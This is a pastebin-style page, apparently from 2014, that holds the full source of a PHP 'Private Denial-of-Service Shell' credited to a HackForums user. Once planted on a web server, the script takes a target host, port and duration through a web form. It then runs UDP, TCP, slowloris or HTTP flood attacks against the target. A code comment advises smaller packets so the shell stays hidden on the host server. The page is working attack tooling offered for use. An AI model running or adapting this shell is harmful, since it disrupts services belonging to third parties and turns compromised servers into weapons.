Sick shell source hits victims off fast


SUBMITTED BY: Guest

DATE: April 10, 2014, 2:18 a.m.

FORMAT: PHP

SIZE: 19.1 kB

HITS: 1209

  1. <?php
  2. if(isset($_GET['method']))
  3. {
  4. $bytes = 65000;
  5. /*
  6. * 65000 bytes is the around max packet size in
  7. * TCP and UDP
  8. *
  9. * lower ths to be secretive about the shell being on
  10. * the web server - you will have less chance of the
  11. * outbound packets being caught.
  12. */
  13. if(empty($_GET['ip']) || empty($_GET['port']) || empty($_GET['length']))
  14. {
  15. exit("You've forgotten something.");
  16. }
  17. if($_GET['method'] == "udp")
  18. {
  19. ignore_user_abort(true);
  20. set_time_limit(0);
  21. ob_start();
  22. echo "Attack sent!";
  23. $s = ob_get_length();
  24. header("Content-Length: {$s}");
  25. header("Content-Encoding: none");
  26. header("Connection: close");
  27. ob_end_flush();
  28. ob_flush();
  29. flush();
  30. if(session_id()) session_write_close();
  31. $n = 0;
  32. $packet = '';
  33. do
  34. {
  35. switch($n)
  36. {
  37. case 0:
  38. $packet .= 'A';
  39. break;
  40. case 1:
  41. $packet .= 'S';
  42. break;
  43. case 2:
  44. $packet .= 'D';
  45. break;
  46. case 3:
  47. $packet .= 'A';
  48. break;
  49. }
  50. $n++;
  51. if($n == 4) $n = 0;
  52. } while(strlen($packet) != $bytes);
  53. $running = true;
  54. $runFor = strtotime('now') + $_GET['length'];
  55. do
  56. {
  57. if(strtotime('now') > $runFor)
  58. {
  59. $running = false;
  60. }
  61. $sock = @fsockopen("udp://{$_GET['ip']}", $_GET['port'], $errno, $errstr, 10);
  62. if($sock)
  63. {
  64. fwrite($sock, $packet);
  65. fclose($sock);
  66. }
  67. else
  68. {
  69. $sock = @fsockopen("udp://{$_GET['ip']}", $_GET['port'], $errno, $errstr, 10);
  70. fwrite($sock, $packet);
  71. }
  72. } while($running == true);
  73. }
  74. elseif($_GET['method'] == "slowloris")
  75. {
  76. ignore_user_abort(true);
  77. set_time_limit(0);
  78. ob_start();
  79. echo "Attack sent!";
  80. $s = ob_get_length();
  81. header("Content-Length: {$s}");
  82. header("Content-Encoding: none");
  83. header("Connection: close");
  84. ob_end_flush();
  85. ob_flush();
  86. flush();
  87. if(session_id()) session_write_close();
  88. $header = array();
  89. $header[] = "GET / HTTP/1.1";
  90. $header[] = "User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.63 Safari/535.7";
  91. $header[] = "Host: {$_GET['ip']}";
  92. $header[] = "Keep-Alive: 900";
  93. $header[] = "Content-Length: " . mt_rand(100000, 1000000);
  94. $header[] = "Connection: keep-alive";
  95. $sock = @fsockopen($_GET['ip'], $_GET['port'], $errno, $errstr);
  96. if($sock)
  97. {
  98. fwrite($sock, implode("\r\n", $header));
  99. $running = false;
  100. $runFor = strtotime('now') + $_GET['length'];
  101. do
  102. {
  103. if(strtotime('now') > $runFor)
  104. {
  105. $running = false;
  106. }
  107. if($sock)
  108. {
  109. fwrite($sock, '.');
  110. sleep(3);
  111. }
  112. else
  113. {
  114. $sock = @fsockopen($_GET['ip'], $_GET['port'], $errno, $errstr);
  115. fwrite($sock, implode("\r\n", $header));
  116. }
  117. } while($running == true);
  118. }
  119. }
  120. elseif($_GET['method'] == "tcp")
  121. {
  122. ignore_user_abort(true);
  123. set_time_limit(0);
  124. ob_start();
  125. echo "Attack sent!";
  126. $s = ob_get_length();
  127. header("Content-Length: {$s}");
  128. header("Content-Encoding: none");
  129. header("Connection: close");
  130. ob_end_flush();
  131. ob_flush();
  132. flush();
  133. if(session_id()) session_write_close();
  134. $n = 0;
  135. $packet = '';
  136. do
  137. {
  138. switch($n)
  139. {
  140. case 0:
  141. $packet .= 'A';
  142. break;
  143. case 1:
  144. $packet .= 'S';
  145. break;
  146. case 2:
  147. $packet .= 'D';
  148. break;
  149. case 3:
  150. $packet .= 'A';
  151. break;
  152. }
  153. $n++;
  154. if($n == 4) $n = 0;
  155. } while(strlen($packet) != $bytes);
  156. $running = true;
  157. $runFor = strtotime('now') + $_GET['length'];
  158. do
  159. {
  160. if(strtotime('now') > $runFor)
  161. {
  162. $running = false;
  163. }
  164. $sock = @fsockopen("tcp://{$_GET['ip']}", $_GET['port'], $errno, $errstr, 10);
  165. if($sock)
  166. {
  167. fwrite($sock, $packet);
  168. fclose($sock);
  169. }
  170. else
  171. {
  172. $sock = @fsockopen("tcp://{$_GET['ip']}", $_GET['port'], $errno, $errstr, 10);
  173. fwrite($sock, $packet);
  174. }
  175. } while($running == true);
  176. }
  177. elseif($_GET['method'] == "http")
  178. {
  179. ignore_user_abort(true);
  180. set_time_limit(0);
  181. ob_start();
  182. echo "Attack sent!";
  183. $s = ob_get_length();
  184. header("Content-Length: {$s}");
  185. header("Content-Encoding: none");
  186. header("Connection: close");
  187. ob_end_flush();
  188. ob_flush();
  189. flush();
  190. if(session_id()) session_write_close();
  191. $header = array();
  192. $header[] = "GET / HTTP/1.1";
  193. $header[] = "Host: {$_GET['ip']}";
  194. $header[] = "User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.63 Safari/535.7";
  195. $header[] = "Keep-Alive: 300";
  196. $header[] = "Content-Length: " . mt_rand(100000, 1000000);
  197. $header[] = "Connection: keep-alive";
  198. $sock = @fsockopen($_GET['ip'], $_GET['port'], $errno, $errstr);
  199. if($sock)
  200. {
  201. fwrite($sock, implode("\r\n", $header));
  202. $running = false;
  203. $runFor = strtotime('now') + $_GET['length'];
  204. do
  205. {
  206. if(strtotime('now') > $runFor)
  207. {
  208. $running = false;
  209. }
  210. if($sock)
  211. {
  212. fwrite($sock, '.');
  213. fclose($sock);
  214. sleep(3);
  215. }
  216. else
  217. {
  218. $sock = @fsockopen($_GET['ip'], $_GET['port'], $errno, $errstr);
  219. fwrite($sock, implode("\r\n", $header));
  220. }
  221. } while($running == true);
  222. }
  223. }
  224. }
  225. ?>
  226. <!DOCTYPE html>
  227. <html>
  228. <head>
  229. <meta charset="utf-8">
  230. <meta name="author" content="ASDA">
  231. <meta name="robots" content="noindex, nofollow">
  232. <title>&nbsp;Private Denial-of-Service Shell | Created by ASDA | HackForums.net | </title>
  233. <style>
  234. html, body
  235. {
  236. height: 100%;
  237. cursor: none;
  238. background: #000;
  239. color: #66ff33;
  240. overflow: hidden;
  241. }
  242. h1
  243. {
  244. text-align: center;
  245. font-size: 50px;
  246. }
  247. #barX
  248. {
  249. background: #66ff33;
  250. left: 0;
  251. top: 0;
  252. position: absolute;
  253. width: 1px;
  254. height: 100%;
  255. z-index: 1000;
  256. }
  257. #barY
  258. {
  259. background: #66ff33;
  260. left: 0;
  261. top: 0;
  262. position: absolute;
  263. width: 100%;
  264. height: 1px;
  265. z-index: 1000;
  266. }
  267. input
  268. {
  269. cursor: none;
  270. border: 1px solid #11ff00;
  271. margin-bottom: 20px;
  272. }
  273. form
  274. {
  275. width: 50px;
  276. margin: auto;
  277. }
  278. label
  279. {
  280. display: block;
  281. }
  282. iframe
  283. {
  284. display: none;
  285. visibility: hidden;
  286. }
  287. </style>
  288. </head>
  289. <body>
  290. <div id="barY"></div>
  291. <div id="barX"></div>
  292. <div id="doColours"></div>
  293. <form action="<?php echo $_SERVER["SCRIPT_NAME"]; ?>" method="GET">
  294. <label for="ip">Host:</label>
  295. <input type="text" name="ip" id="ip">
  296. <label for="port">Port:</label>
  297. <input type="text" name="port" id="port">
  298. <label for="length">Length:</label>
  299. <input type="text" name="length" id="length">
  300. <label for="method">Method:</label>
  301. <select name="method" id="method">
  302. <option value="slowloris">Slowloris</option>
  303. <option value="udp">UDP Flood</option>
  304. <option value="tcp">TCP Flood</option>
  305. <option value="http">HTTP Flood</option>
  306. </select>
  307. <br><br>
  308. <input type="submit" value="ATTACK!">
  309. </form>
  310. <div id="youtube"></div>
  311. <script type="text/javascript" src="//ajax.googleapis.com/ajax/libs/jquery/1.8.0/jquery.min.js"></script>
  312. <script type="text/javascript">
  313. $(document).ready(function(){
  314. var title = document.title;
  315. setInterval(function(){title = title.substring(1, title.length) + title.substring(0, 1);document.title = title;}, 300);
  316. $("body").bind('mousemove', function(evt) {
  317. $("#barY").css({
  318. "top": evt.pageY + 10 + "px"
  319. });
  320. $("#barX").css({
  321. "left": evt.pageX + 10 + "px"
  322. });
  323. });
  324. var youtubea = new Array();
  325. youtubea[0] = "<iframe src=\"https://youtube.com/embed/zeIjmvZZ_SQ?autoplay=1\" frameborder=\"0\"></iframe>";
  326. youtubea[1] = "<iframe src=\"https://youtube.com/embed/-ieJtn73e1w?autoplay=1\" frameborder=\"0\"></iframe>";
  327. youtubea[2] = "<iframe src=\"https://youtube.com/embed/w1bRniqs774?autoplay=1\" frameborder=\"0\"></iframe>";
  328. youtubea[3] = "<iframe src=\"https://youtube.com/embed/GqUN76-_Djg?autoplay=1\" frameborder=\"0\"></iframe>";
  329. youtubea[4] = "<iframe src=\"https://youtube.com/embed/UDzNq1s7dAE?autoplay=1\" frameborder=\"0\"></iframe>";
  330. youtubea[5] = "<iframe src=\"https://youtube.com/embed/DC9xwwmyS70?autoplay=1\" frameborder=\"0\"></iframe>";
  331. youtubea[6] = "<iframe src=\"https://youtube.com/embed/liYyEqlvG1Y?autoplay=1#t=17s\" frameborder=\"0\"></iframe>";
  332. youtubea[7] = "<iframe src=\"https://youtube.com/embed/K1VLaXoRRdk?autoplay=1\" frameborder=\"0\"></iframe>";
  333. youtubea[8] = "<iframe src=\"https://youtube.com/embed/EZxeJV-G9kg?autoplay=1\" frameborder=\"0\"></iframe>";
  334. youtubea[9] = "<iframe src=\"https://youtube.com/embed/JRwXku3nM1c?autoplay=1\" frameborder=\"0\"></iframe>";
  335. youtubea[10] = "<iframe src=\"https://youtube.com/embed/oKpPd2hDrE4?autoplay=1\" frameborder=\"0\"></iframe>";
  336. youtubea[11] = "<iframe src=\"https://youtube.com/embed/3Rd0LHQHjWg?autoplay=1\" frameborder=\"0\"></iframe>";
  337. youtubea[12] = "<iframe src=\"https://youtube.com/embed/nuno2jOwOjo?autoplay=1\" frameborder=\"0\"></iframe>";
  338. youtubea[13] = "<iframe src=\"https://youtube.com/embed/xLho8rMQpoI?autoplay=1\" frameborder=\"0\"></iframe>";
  339. var rand = Math.floor(Math.random() * (youtubea.length + 1));
  340. $('#youtube').html(youtubea[rand]);
  341. function doColour(a){setInterval(function(){for(var b=0;b<a.length;b++){$("#letter"+b).css({color:colour[b]})}for(var b=0;b<colour.length;b++){colour[b-1]=colour[b]}colour[colour.length-1]=colour[-1]},50)}function initColours(a){var b="\x41\x53\x44\x41\x27\x73\x20\x50\x72\x69\x76\x61\x74\x65\x20\x53\x68\x65\x6C\x6C".split("");var c="<h1>";$.each(b,function(a,b){c+="<span id='letter"+a+"'>"+b+"</span>"});c+="</h1>";$("#doColours").html(c);doColour(b);var d=1;setInterval(function(){while(colour.length<b.length){colour=colour.concat(colour)}d=Math.floor(Math.random()*colours.length);colour=colours[d]},5e3)}colours=new Array;colours[0]=new Array("#FF0000","#FF1100","#FF2200","#FF3300","#FF4400","#FF5500","#FF6600","#FF7700","#FF8800","#FF9900","#FFaa00","#FFbb00","#FFcc00","#FFdd00","#FFee00","#FFff00","#FFee00","#FFdd00","#FFcc00","#FFbb00","#FFaa00","#FF9900","#FF8800","#FF7700","#FF6600","#FF5500","#FF4400","#FF3300","#FF2200","#FF1100");colours[1]=new Array("#00FF00","#000000","#00FF00","#00FF00","#00FF00","#000000","#00FF00","#00FF00","#00FF00","#000000","#00FF00","#00FF00","#00FF00","#000000","#00FF00","#00FF00","#00FF00","#000000","#00FF00","#00FF00","#00FF00","#000000","#00FF00","#00FF00","#00FF00","#000000","#00FF00","#00FF00");colours[2]=new Array("#00FF00","#FF0000","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00");colours[3]=new Array("#FF0000","#FF4000","#FF8000","#FFC000","#FFFF00","#C0FF00","#80FF00","#40FF00","#00FF00","#00FF40","#00FF80","#00FFC0","#00FFFF","#00C0FF","#0080FF","#0040FF","#0000FF","#4000FF","#8000FF","#C000FF","#FF00FF","#FF00C0","#FF0080","#FF0040");colours[4]=new Array("#FF0000","#EE0000","#DD0000","#CC0000","#BB0000","#AA0000","#990000","#880000","#770000","#660000","#550000","#440000","#330000","#220000","#110000","#000000","#110000","#220000","#330000","#440000","#550000","#660000","#770000","#880000","#990000","#AA0000","#BB0000","#CC0000","#DD0000","#EE0000");colours[5]=new Array("#000000","#000000","#000000","#FFFFFF","#FFFFFF","#FFFFFF","#000000","#000000","#000000","#FFFFFF","#FFFFFF","#FFFFFF","#000000","#000000","#000000","#FFFFFF","#FFFFFF","#FFFFFF","#000000","#000000","#000000","#FFFFFF","#FFFFFF","#FFFFFF","#000000","#000000","#000000","#FFFFFF","#FFFFFF","#FFFFFF");colours[6]=new Array("#0000FF","#FFFF00","#0000FF","#FFFF00","#0000FF","#FFFF00","#0000FF","#FFFF00","#0000FF","#FFFF00","#0000FF","#FFFF00","#0000FF","#FFFF00","#0000FF","#FFFF00","#0000FF","#FFFF00","#0000FF","#FFFF00","#0000FF","#FFFF00","#0000FF","#FFFF00","#0000FF","#FFFF00","#0000FF","#FFFF00","#0000FF","#FFFF00","#0000FF","#FFFF00","#0000FF","#FFFF00","#0000FF","#FFFF00");colour=colours[4];initColours();
  342. });
  343. </script>
  344. </body>
  345. </html>

comments powered by Disqus